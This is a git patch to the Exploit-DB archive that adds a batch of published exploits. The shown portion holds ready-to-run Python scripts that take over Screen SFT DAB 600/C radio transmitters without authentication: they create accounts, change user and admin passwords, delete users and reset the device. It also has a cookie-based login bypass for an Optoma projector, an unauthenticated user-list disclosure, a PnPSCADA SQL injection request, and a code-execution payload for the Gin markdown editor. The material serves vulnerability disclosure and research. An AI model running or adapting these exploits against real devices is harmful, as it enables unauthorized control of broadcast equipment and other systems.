From 0a7adaa3fcdd8a907b3f89e0fdfc59ab67f6ffab Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 24 May 2023 00:16:34 +0000
Subject: [PATCH] DB: 2023-05-24
40 changes to exploits/shellcodes/ghdb
Optoma 1080PSTX Firmware C02 - Authentication Bypass
Screen SFT DAB 600/C - Authentication Bypass Account Creation
Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
Screen SFT DAB 600/C - Authentication Bypass Erase Account
Screen SFT DAB 600/C - Authentication Bypass Password Change
Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
Apache Superset 2.0.0 - Authentication Bypass
FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
Affiliate Me Version 5.0.1 - SQL Injection
Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
e107 v2.3.2 - Reflected XSS
File Thingie 2.5.7 - Remote Code Execution (RCE)
GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
LeadPro CRM v1.0 - SQL Injection
PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
Prestashop 8.0.4 - CSV injection
Quicklancer v1.0 - SQL Injection
SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Smart School v1.0 - SQL Injection
Stackposts Social Marketing Tool v1.0 - SQL Injection
thrsrossi Millhouse-Project 1.414 - Remote Code Execution
TinyWebGallery v2.5 - Remote Code Execution (RCE)
WBiz Desk 1.2 - SQL Injection
Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title
Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
MobileTrans 4.0.11 - Weak Service Privilege Escalation
Trend Micro OfficeScan Client 10.0 - ACL Service LPE
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
---
exploits/hardware/remote/51444.txt | 23 ++++
exploits/hardware/remote/51455.py | 102 +++++++++++++++
exploits/hardware/remote/51456.py | 102 +++++++++++++++
exploits/hardware/remote/51457.py | 94 ++++++++++++++
exploits/hardware/remote/51458.py | 96 +++++++++++++++
exploits/hardware/remote/51459.py | 93 ++++++++++++++
exploits/hardware/remote/51460.txt | 45 +++++++
exploits/hardware/webapps/51448.txt | 22 ++++
exploits/multiple/local/51469.txt | 25 ++++
exploits/multiple/local/51470.txt | 28 +++++
exploits/multiple/webapps/51447.py | 105 ++++++++++++++++
exploits/multiple/webapps/51452.py | 115 +++++++++++++++++
exploits/multiple/webapps/51480.txt | 30 +++++
exploits/php/webapps/51436.py | 12 +-
exploits/php/webapps/51443.txt | 124 +++++++++++++++++++
exploits/php/webapps/51445.txt | 38 ++++++
exploits/php/webapps/51449.txt | 150 +++++++++++++++++++++++
exploits/php/webapps/51450.php | 84 +++++++++++++
exploits/php/webapps/51451.txt | 28 +++++
exploits/php/webapps/51454.txt | 184 ++++++++++++++++++++++++++++
exploits/php/webapps/51462.py | 148 ++++++++++++++++++++++
exploits/php/webapps/51463.txt | 20 +++
exploits/php/webapps/51464.txt | 63 ++++++++++
exploits/php/webapps/51465.txt | 45 +++++++
exploits/php/webapps/51468.txt | 28 +++++
exploits/php/webapps/51471.txt | 45 +++++++
exploits/php/webapps/51472.txt | 43 +++++++
exploits/php/webapps/51473.txt | 34 +++++
exploits/php/webapps/51474.txt | 36 ++++++
exploits/php/webapps/51475.py | 140 +++++++++++++++++++++
exploits/php/webapps/51476.txt | 64 ++++++++++
exploits/php/webapps/51477.txt | 17 +++
exploits/php/webapps/51478.txt | 27 ++++
exploits/ruby/webapps/51446.txt | 55 +++++++++
exploits/windows/local/51453.txt | 91 ++++++++++++++
exploits/windows/local/51461.txt | 48 ++++++++
exploits/windows/local/51479.txt | 53 ++++++++
exploits/windows/webapps/51466.txt | 23 ++++
exploits/windows/webapps/51467.txt | 19 +++
files_exploits.csv | 40 +++++-
40 files changed, 2532 insertions(+), 7 deletions(-)
create mode 100644 exploits/hardware/remote/51444.txt
create mode 100755 exploits/hardware/remote/51455.py
create mode 100755 exploits/hardware/remote/51456.py
create mode 100755 exploits/hardware/remote/51457.py
create mode 100755 exploits/hardware/remote/51458.py
create mode 100755 exploits/hardware/remote/51459.py
create mode 100644 exploits/hardware/remote/51460.txt
create mode 100644 exploits/hardware/webapps/51448.txt
create mode 100644 exploits/multiple/local/51469.txt
create mode 100644 exploits/multiple/local/51470.txt
create mode 100755 exploits/multiple/webapps/51447.py
create mode 100755 exploits/multiple/webapps/51452.py
create mode 100644 exploits/multiple/webapps/51480.txt
create mode 100644 exploits/php/webapps/51443.txt
create mode 100644 exploits/php/webapps/51445.txt
create mode 100644 exploits/php/webapps/51449.txt
create mode 100644 exploits/php/webapps/51450.php
create mode 100644 exploits/php/webapps/51451.txt
create mode 100644 exploits/php/webapps/51454.txt
create mode 100755 exploits/php/webapps/51462.py
create mode 100644 exploits/php/webapps/51463.txt
create mode 100644 exploits/php/webapps/51464.txt
create mode 100644 exploits/php/webapps/51465.txt
create mode 100644 exploits/php/webapps/51468.txt
create mode 100644 exploits/php/webapps/51471.txt
create mode 100644 exploits/php/webapps/51472.txt
create mode 100644 exploits/php/webapps/51473.txt
create mode 100644 exploits/php/webapps/51474.txt
create mode 100755 exploits/php/webapps/51475.py
create mode 100644 exploits/php/webapps/51476.txt
create mode 100644 exploits/php/webapps/51477.txt
create mode 100644 exploits/php/webapps/51478.txt
create mode 100644 exploits/ruby/webapps/51446.txt
create mode 100644 exploits/windows/local/51453.txt
create mode 100644 exploits/windows/local/51461.txt
create mode 100644 exploits/windows/local/51479.txt
create mode 100644 exploits/windows/webapps/51466.txt
create mode 100644 exploits/windows/webapps/51467.txt
diff --git a/exploits/hardware/remote/51444.txt b/exploits/hardware/remote/51444.txt
new file mode 100644
index 000000000..598268172
--- /dev/null
+++ b/exploits/hardware/remote/51444.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
+# Date: 2023/05/09
+# Exploit Author: Anthony Cole
+# Contact: http://twitter.com/acole76
+# Website: http://twitter.com/acole76
+# Vendor Homepage: http://optoma.com
+# Version: Optoma 1080PSTX Firmware C02
+# Tested on: N/A
+# CVE : CVE-2023-27823
+
+Details
+By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".
+
+GET /index.asp HTTP/1.1
+Host: projector
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: atop=1
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/remote/51455.py b/exploits/hardware/remote/51455.py
new file mode 100755
index 000000000..086a45150
--- /dev/null
+++ b/exploits/hardware/remote/51455.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+# Bios firmware: 7.1 (Apr 19 2021)
+# Gui: 2.46
+# FPGA: 169.55
+# uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+# MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5771
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+ '''
+██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
+██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
+██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
+ '''
+ +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+ '''
+ ZSL and the Producers insist that no one
+ submit any exploits of themselfs or others
+ performing any dangerous activities.
+ We will not open or view them.
+ '''
+ +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::newUser')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept':'application/json, text/plain, */*',
+ 'Accept-Language':'ku-MK,en;q=0.9',
+ 'Accept-Encoding':'gzip, deflate',
+ 'User-Agent':'Dabber++',
+ 'Connection':'close'}
+j={'ssbtIdx':0,
+ 'ssbtType':'userManager',
+ 'ssbtObj':{
+ 'newUser':{
+ 'password':h,
+ 'type':'OPERATOR',
+ 'username':u
+ }
+ },
+ }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+ print('Done.')
+else:
+ print('Error')
+exit(-5)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51456.py b/exploits/hardware/remote/51456.py
new file mode 100755
index 000000000..bb87cc5e3
--- /dev/null
+++ b/exploits/hardware/remote/51456.py
@@ -0,0 +1,102 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+# Bios firmware: 7.1 (Apr 19 2021)
+# Gui: 2.46
+# FPGA: 169.55
+# uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+# MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5772
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+ '''
+██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
+██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
+██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
+ '''
+ +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+ '''
+ ZSL and the Producers insist that no one
+ submit any exploits of themselfs or others
+ performing any dangerous activities.
+ We will not open or view them.
+ '''
+ +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::changeUserPswd')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept':'application/json, text/plain, */*',
+ 'Accept-Language':'ku-MK,en;q=0.9',
+ 'Accept-Encoding':'gzip, deflate',
+ 'User-Agent':'Dabber+',
+ 'Connection':'close'}
+j={'ssbtIdx':0,
+ 'ssbtType':'userManager',
+ 'ssbtObj':{
+ 'changeUserPswd':{
+ 'username':u,
+ 'password':h
+ }
+ },
+ }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+ print('Done.')
+else:
+ print('Error')
+exit(-4)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51457.py b/exploits/hardware/remote/51457.py
new file mode 100755
index 000000000..4e46b9247
--- /dev/null
+++ b/exploits/hardware/remote/51457.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+# Bios firmware: 7.1 (Apr 19 2021)
+# Gui: 2.46
+# FPGA: 169.55
+# uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+# MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5773
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+ '''
+██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
+██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
+██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
+ '''
+ +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+ '''
+ ZSL and the Producers insist that no one
+ submit any exploits of themselfs or others
+ performing any dangerous activities.
+ We will not open or view them.
+ '''
+ +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+u=input('Enter desired username: ')
+e='/system/api/userManager.cgx'
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::removeUser')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept':'application/json, text/plain, */*',
+ 'Accept-Language':'ku-MK,en;q=0.9',
+ 'Accept-Encoding':'gzip, deflate',
+ 'User-Agent':'Dabber-',
+ 'Connection':'close'}
+j={'ssbtIdx':0,
+ 'ssbtType':'userManager',
+ 'ssbtObj':{
+ 'removeUser':u
+ }
+ }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+ print('Done.')
+else:
+ print('Error')
+exit(-3)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51458.py b/exploits/hardware/remote/51458.py
new file mode 100755
index 000000000..ea2c28943
--- /dev/null
+++ b/exploits/hardware/remote/51458.py
@@ -0,0 +1,96 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+# Bios firmware: 7.1 (Apr 19 2021)
+# Gui: 2.46
+# FPGA: 169.55
+# uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: This exploit circumvents the control and requirement of admin's
+# old password and directly changes the password.
+#
+# Tested on: Keil-EWEB/2.1
+# MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5774
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+ '''
+██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
+██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
+██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
+ '''
+ +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+ '''
+ ZSL and the Producers insist that no one
+ submit any exploits of themselfs or others
+ performing any dangerous activities.
+ We will not open or view them.
+ '''
+ +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+p=input('Enter desired password: ')
+e='/system/api/userManager.cgx'
+m5=hashlib.md5()
+m5.update(p.encode('utf-8'))
+h=m5.hexdigest()
+print('Your sig:',h)
+print('Calling object: ssbtObj')
+print('CGX fastcall: userManager::changeUserPswd')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept':'application/json, text/plain, */*',
+ 'Accept-Language':'ku-MK,en;q=0.9',
+ 'Accept-Encoding':'gzip, deflate',
+ 'User-Agent':'Dabber-+',
+ 'Connection':'close'}
+j={'ssbtIdx':0,
+ 'ssbtType':'userManager',
+ 'ssbtObj':{
+ 'changeUserPswd':{
+ 'username':'admin',
+ 'password':h
+ }
+ },
+ }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+ print('Done.')
+else:
+ print('Error')
+exit(-2)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51459.py b/exploits/hardware/remote/51459.py
new file mode 100755
index 000000000..39cbf1304
--- /dev/null
+++ b/exploits/hardware/remote/51459.py
@@ -0,0 +1,93 @@
+#!/usr/bin/env python3
+#
+# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
+# Exploit Author: LiquidWorm
+#
+#
+# Vendor: DB Elettronica Telecomunicazioni SpA
+# Product web page: https://www.screen.it | https://www.dbbroadcast.com
+# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+# Affected version: Firmware: 1.9.3
+# Bios firmware: 7.1 (Apr 19 2021)
+# Gui: 2.46
+# FPGA: 169.55
+# uc: 6.15
+#
+# Summary: Screen's new radio DAB Transmitter is reaching the highest
+# technology level in both Digital Signal Processing and RF domain.
+# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+# digital adaptive precorrection and configuatio flexibility, the Hot
+# Swap System technology, the compactness and the smart system design,
+# the SFT DAB are advanced transmitters. They support standards DAB,
+# DAB+ and T-DMB and are compatible with major headend brands.
+#
+# Desc: The application suffers from a weak session management that can
+# allow an attacker on the same network to bypass these controls by reusing
+# the same IP address assigned to the victim user (NAT) and exploit crucial
+# operations on the device itself. By abusing the IP address property that
+# is binded to the Session ID, one needs to await for such an established
+# session and issue unauthorized requests to the vulnerable API to manage
+# and/or manipulate the affected transmitter.
+#
+# Tested on: Keil-EWEB/2.1
+# MontaVista® Linux® Carrier Grade eXpress (CGX)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5775
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
+#
+#
+# 19.03.2023
+#
+
+import hashlib,datetime##########
+import requests,colorama#########
+from colorama import Fore, Style#
+colorama.init()
+print(Fore.RED+Style.BRIGHT+
+ '''
+██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
+██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
+██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
+ '''
+ +Style.RESET_ALL)
+print(Fore.WHITE+Style.BRIGHT+
+ '''
+ ZSL and the Producers insist that no one
+ submit any exploits of themselfs or others
+ performing any dangerous activities.
+ We will not open or view them.
+ '''
+ +Style.RESET_ALL)
+s=datetime.datetime.now()
+s=s.strftime('%d.%m.%Y %H:%M:%S')
+print('Starting API XPL -',s)
+t=input('Enter transmitter ip: ')
+e='/system/api/deviceManagement.cgx'
+print('Calling object: ssbtObj')
+print('CGX fastcall: deviceManagement::reset')
+t='http://'+t+e
+bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept':'application/json, text/plain, */*',
+ 'Accept-Language':'ku-MK,en;q=0.9',
+ 'Accept-Encoding':'gzip, deflate',
+ 'User-Agent':'Dabber--',
+ 'Connection':'close'}
+j={'ssbtIdx':0,
+ 'ssbtType':'deviceManagement',
+ 'ssbtObj':{
+ 'reset':'true'
+ }
+ }
+r=requests.post(t,headers=bh,json=j)
+if r.status_code==200:
+ print('Done.')
+else:
+ print('Error')
+exit(-1)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51460.txt b/exploits/hardware/remote/51460.txt
new file mode 100644
index 000000000..879b81ead
--- /dev/null
+++ b/exploits/hardware/remote/51460.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
+# Exploit Author: LiquidWorm
+
+Vendor: DB Elettronica Telecomunicazioni SpA
+Product web page: https://www.screen.it | https://www.dbbroadcast.com
+ https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
+Affected version: Firmware: 1.9.3
+ Bios firmware: 7.1 (Apr 19 2021)
+ Gui: 2.46
+ FPGA: 169.55
+ uc: 6.15
+
+Summary: Screen's new radio DAB Transmitter is reaching the highest
+technology level in both Digital Signal Processing and RF domain.
+SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
+digital adaptive precorrection and configuatio flexibility, the Hot
+Swap System technology, the compactness and the smart system design,
+the SFT DAB are advanced transmitters. They support standards DAB,
+DAB+ and T-DMB and are compatible with major headend brands.
+
+Desc: Screen is affected by an information disclosure vulnerability
+due to improper access control enforcement. An unauthenticated remote
+attacker can exploit this, via a specially crafted request to gain
+access to sensitive information including usernames and source IP
+addresses.
+
+Tested on: Keil-EWEB/2.1
+ MontaVista® Linux® Carrier Grade eXpress (CGX)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5776
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
+
+
+19.03.2023
+
+--
+
+
+$ curl 'http://SFTDAB/system/api/userManager.cgx'
+{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51448.txt b/exploits/hardware/webapps/51448.txt
new file mode 100644
index 000000000..2bb6425fa
--- /dev/null
+++ b/exploits/hardware/webapps/51448.txt
@@ -0,0 +1,22 @@
+# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
+# Date: 15/5/2023
+# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
+# Vendor Homepage: https://pnpscada.com/
+# Version: PnPSCADA (cross platforms): v2.x
+# Tested on: Unix
+# CVE : CVE-2023-1934
+# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8
+
+SQLi crashing point:
+
+GET /hitlogcsv.isp?userids=1337'&startdate=
+2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
+HTTP/1.1
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
+AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
+Safari/534.14
+Host: vulnerablepnpscada.int
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
\ No newline at end of file
diff --git a/exploits/multiple/local/51469.txt b/exploits/multiple/local/51469.txt
new file mode 100644
index 000000000..b699fb0c4
--- /dev/null
+++ b/exploits/multiple/local/51469.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-24
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31873
+# Vendor Homepage: https://github.com/mariuskueng/gin
+# Software Link: https://github.com/mariuskueng/gin
+# Version: 0.7.4
+# Tested on: [Mac OS 13]
+
+Release Date:
+
+2023-04-24
+
+Product & Service Introduction: Javascript Markdown editor for Mac
+
+Technical Details & Description:
+A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.
+
+Proof of Concept (PoC):
+Arbitrary code execution:
+
+Create a markdown file (.md) in any text editor and write the following payload:
+<video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
+
+Opening the file in Gin will auto execute the Calculator application.
\ No newline at end of file
diff --git a/exploits/multiple/local/51470.txt b/exploits/multiple/local/51470.txt
new file mode 100644
index 000000000..2328e25e0
--- /dev/null
+++ b/exploits/multiple/local/51470.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
+# Date: 2023-04-27
+# Exploit Author: 8bitsec
+# CVE: CVE-2023-31874
+# Vendor Homepage: yank-note.com
+# Software Link: https://github.com/purocean/yn
+# Version: 3.52.1
+# Tested on: [Ubuntu 22.04 | Mac OS 13]
+
+Release Date: 2023-04-27
+
